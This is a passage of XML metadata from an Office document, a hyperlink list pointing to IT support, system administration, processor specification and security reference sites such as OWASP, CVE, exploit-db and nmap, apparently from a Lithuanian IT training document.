        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>917579</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>228</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7602283</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>225</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.exploit-db.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5832726</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>222</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://cve.mitre.org/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>262163</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>219</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://nmap.org/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>93</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>216</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.nksc.lt/pranesti.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>327773</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>213</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.microsoft.com/en-us/wdsi/threats</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2621561</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>210</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.isecom.org/OSSTMM.3.pdf</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6684726</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>207</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://owasp.org/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2949216</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>204</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.archive.org/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5439502</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>201</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.searchenginewatch.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2162739</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>198</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.google.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3735654</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>195</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.mozilla.org/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2949216</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>192</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.archive.org/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5439502</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>189</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.searchenginewatch.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3735586</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>186</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://community.cisco.com/t5/other-network-architecture/impact-of-frequent-power-outtage-to-catalyst-switches/td-p/360510</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6422574</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>183</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://community.cisco.com/t5/routing/rv340-lost-his-configuration-after-power-outage/td-p/4097598</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5570643</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>180</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://community.netgear.com/t5/Nighthawk-WiFi-Routers/Router-wifi-settings-gone-after-power-outage/td-p/1667153</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5439567</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>177</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/system-center/scsm/incident-mgt?view=sc-sm-2019</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7929958</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>174</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=3TPsuio8PP8</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5963849</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>171</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/channel/UCP2uPp7TUXwJCicB0byzDnQ</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6815781</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>168</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=mN12es1rbJ8</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6815781</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>165</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=mN12es1rbJ8</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5439567</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>162</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/system-center/scsm/incident-mgt?view=sc-sm-2019</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7929958</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>159</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=3TPsuio8PP8</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5963849</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>156</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/channel/UCP2uPp7TUXwJCicB0byzDnQ</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2752567</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>153</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.infotechram.com/index.php/2019/12/30/how-to-install-system-center-service-manager-2019/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6094854</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>150</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/system-center/scsm/install-one-computer?view=sc-sm-2019</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5832716</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>147</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://support.microsoft.com/en-us/windows/tips-to-improve-pc-performance-in-windows-10-b3b3ef5b-5953-fb6a-2528-4bbed82fba96</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5242963</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>144</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.computerhope.com/issues/ch000179.htm</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6094928</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>141</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.ccleaner.com/knowledge/why-your-pc-is-so-slow-and-how-you-can-speed-it-up</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>:~:text=Your%20operating%20system%20has%20to,that%20are%20running%20on%20it.&amp;text=Too%20many%20background%20programs,on%20Windows%20or%20driver%20updates</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179654</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>138</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.lifewire.com/how-to-fix-a-computer-that-wont-turn-on-2624450</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1572930</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>135</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.pcmag.com/how-to/what-to-do-when-your-computer-wont-start</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3080233</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>132</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.intel.com/content/www/us/en/gaming/resources/why-wont-my-computer-turn-on.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>983116</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>129</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.seagate.com/gb/en/support/kb/the-bios-does-not-detect-or-recognize-the-ata-sata-hard-drive-168595en/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2687010</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>126</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.seagate.com/gb/en/support/kb/the-bios-does-not-detect-or-recognize-the-solid-state-drive-005707en/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>589914</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>123</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.drivereasy.com/knowledge/fixed-bios-not-detecting-ssd-in-computer/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>:~:text=Solution%202%3A%20Configure%20the%20SSD,is%20not%20recognized%20by%20BIOS.&amp;text=Then%20you'll%20see%20SATA,your%20computer%20to%20enter%20BIOS</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>327769</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>120</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://vitux.com/install-centos-with-virtualbox-on-windows/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7208993</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>117</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://askme4tech.com/acronis-true-image-2020-review-tutorial</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5898321</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>114</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://kb.acronis.com/content/61645</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5570647</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>111</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://kb.acronis.com/content/65468</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3539054</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>108</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.acronis.com/en-eu/homecomputing/thanks/acronis-true-image-2021/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6094892</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>105</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=lqjrF7f_eI4</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4456531</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>102</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/exchange/high-availability/disaster-recovery/windows-server-backup?view=exchserver-2019</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441794</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>99</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://support.microsoft.com/en-us/windows/backup-and-restore-in-windows-10-352091d2-bb9d-3ea3-ed18-52ef2b88cbef</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>852054</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>96</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.microsoft.com/en-us/windows-server/get-started-19/install-upgrade-migrate-19</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7864366</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>93</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2019</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835025</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>90</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.dskoli.in/blog/windows-server-2019-with-desktop-experience-full-interface-clean-installation</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7471186</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>87</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.zabbix.com/documentation/5.0/manual/installation/install_from_packages/rhel_centos</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7012407</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>84</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://bestmonitoringtools.com/how-to-install-zabbix-server-on-centos-or-rhel/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2228325</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>81</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.fosslinux.com/7705/how-to-install-and-configure-zabbix-on-centos-7.htm</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6815757</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>78</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://en.wikipedia.org/wiki/List_of_MediaTek_processors</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179725</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>75</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.qualcomm.com/products/processors</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8060975</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>72</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cpu-world.com/CPUs</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4915219</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>69</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.intel.com/content/www/us/en/products/processors/core.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7929904</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>66</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.amd.com/en/products/processors-desktop</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179736</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>63</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.cisco.com/c/en/us/td/docs/security/security_management/cs-mars/4-3/user/guide/local_controller/cfgrtrsw.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7602295</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>60</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.solidworks.com/support/system-requirements</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4915291</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>57</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.adobe.com/lt/products/photoshop-elements/tech-specs.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7274603</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>54</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://motionarray.com/learn/davinci-resolve/davinci-resolve-system-requirements/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2687020</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>51</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://motionarray.com/learn/davinci-resolve/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>655366</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>48</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
